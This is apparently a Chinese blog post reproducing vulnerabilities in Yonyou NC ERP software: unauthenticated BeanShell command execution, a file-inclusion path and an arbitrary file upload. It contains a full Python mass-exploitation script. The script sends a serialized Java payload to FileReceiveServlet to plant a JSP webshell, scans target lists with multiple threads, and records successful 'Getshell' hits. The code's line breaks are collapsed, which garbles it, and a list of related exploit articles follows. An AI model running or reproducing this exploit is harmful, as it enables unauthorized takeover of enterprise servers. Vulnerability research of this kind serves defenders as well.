用友NC的一些漏洞复现

一、BeanShell Test Servlet命令执行

漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。

影响范围:NC 6.5版本

复现过程:

访问对应网站后界面如下:

漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet

后续还可以写shell进去,但是这里不做测试

二、文件包含

/NCFindWeb?service=IPreAlertConfigService&filename

修改filename参数可以进一步文件包含

/NCFindWeb?service=IPreAlertConfigService&filename=xxx

已经是被人上了马了

三、任意文件上传

参考:https://blog.csdn.net/Adminxe/article/details/111177066

import requests
import threadpool
import urllib3
import sys
import argparseurllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36","Content-Type": "application/x-www-form-urlencoded","Referer": "https://google.com",
}def multithreading(funcname, filename="url.txt", pools=5):works = []with open(filename, "r") as f:for i in f:func_params = [i.rstrip("\n")]works.append((func_params, None))pool = threadpool.ThreadPool(pools)reqs = threadpool.makeRequests(funcname, works)[pool.putRequest(req) for req in reqs]pool.wait()def wirte_targets(vurl, filename):with open(filename, "a+") as f:f.write(vurl + "\n")return vurldef exp(u):uploadHeader = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36","Content-Type": "multipart/form-data;","Referer": "https://google.com"}uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"shellFlag="t0test0ls"uploadData+=shellFlagtry:req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)if req1.status_code == 200 :req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)if  req3.text.index(shellFlag)>=0:printFlag = "[Getshell]" + u+"/t00ls.jsp"  + "\n"print (printFlag)wirte_targets(printFlag, "vuln.txt")except :pass#print(printFlag, end="")if __name__ == "__main__":if (len(sys.argv)) < 2:print('useage : python' +str(sys.argv[0]) + ' -h')else:parser =argparse.ArgumentParser()parser.description ='YONYOU UC 6.5 FILE UPLOAD!'parser.add_argument('-u',help="url -> example [url]http://127.0.0.1[/url]",type=str,dest='check_url')parser.add_argument('-r',help="url list to file",type=str,dest='check_file')args =parser.parse_args()if args.check_url:exp(args.check_url)if(args.check_file):multithreading(exp, args.check_file, 8)

用友NC的一些漏洞复现相关推荐

  1. CNVD-2021-30167 用友NC命令执行漏洞复现

    一.漏洞概述 2021年06月03日,用友官方发布了用友BeanShell远程代码执行漏洞的风险通告,漏洞编号为CNVD-2021-30167,漏洞等级:严重,漏洞评分:9.8. 用友NC是面向集团企 ...

  2. 用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)

    0x01 产品简介 用友NC是一款企业级ERP软件.作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计.采购管理.销售管理.物料管理.生产计划和人力资源管理等,帮助企业实现数字化转 ...

  3. 用友NC目录遍历漏洞复现

    简介: 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息. 漏洞复现: fofa直接搜索: app="用友-UFIDA-NC" 漏洞拼接目录: /NCFi ...

  4. 用友php漏洞,用友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导 ...

  5. x友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.漏洞复现 SQL注入POC ...

  6. X友 NC 远程命令执行

    X友 NC 远程命令执行 一.漏洞简介 用友NC是一款企业级管理软件,在大中型企业广泛使用.实现建模.开发.继承.运行.管理一体化的IT解决方案信息化平台. 用友NC存在反序列化漏洞,攻击者通过构造特 ...

  7. 用友NC BeanShell远程代码执行漏洞复现

    用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...

  8. 用友NC 漏洞汇总(转载)

    komomon 编码安全研究 2022-11-21 09:09 发表于北京 免责声明 本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不 ...

  9. 用友NC远程命令执行漏洞通告

    用友NC远程命令执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)

  10. 用友GRP-u8 XXE 漏洞复现

    0x00 漏洞描述 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 0x01 漏洞利用条件 无需登录 0x02 漏洞复现 POC: ...

最新文章

  1. reflective dll injection 反射注入
  2. 2022年全球及中国户外电源产品行业容量前景与运营动态分析报告
  3. 第6次cplus实验
  4. 网络流及建模专题(下)
  5. C++三路比较运算符
  6. 论文浅尝 | 基于知识库的自然语言理解 03#
  7. 小程序遵循的语法_我如何构建一个遵循股市针对freeCodeCamp挑战的应用程序。
  8. 第一次使用水晶报表,柱状图的横竖坐标不会定位,怎么办?
  9. 从头学习Drupal--基本架构三
  10. 如何插入电子签名_如何在电子文档上签名?可靠电子签名的特征有哪些?
  11. vue图片压缩与批量上传
  12. Elasticsearch Join类型查询父子关系
  13. VS2008简体中文版下载及安装破解
  14. Flask框架学习:蓝图的使用
  15. 【2014-3】day3 T1 五彩斑斓
  16. C语言程序设计(11.28)
  17. Store Forwarding
  18. 计算机毕业设计Java毕业论文答辩管理系统(源码+系统+mysql数据库+lw文档)
  19. U校园服务器维修,U校园使用指南
  20. 【springcloud gateway诡异间歇性500异常解决】500 Server Error,ConcurrentModificationException: null

热门文章

  1. 阿里云运行python_阿里云运行python代码
  2. 免费代理ip地址(部分验证过,可使用)
  3. 云桌面优缺点_桌面云优缺点
  4. PLA算法总结及其证明
  5. 【Vue】前端跨域解决方法
  6. 采购订单模板_金蝶KIS商贸版(采购模块)常见问题汇总
  7. 六轴机器人轨迹规划之matlab画直线
  8. Matlab图像线条绘制
  9. 智慧交通综合管理平台建设方案
  10. 【VBScript恶搞代码】电脑自爆警告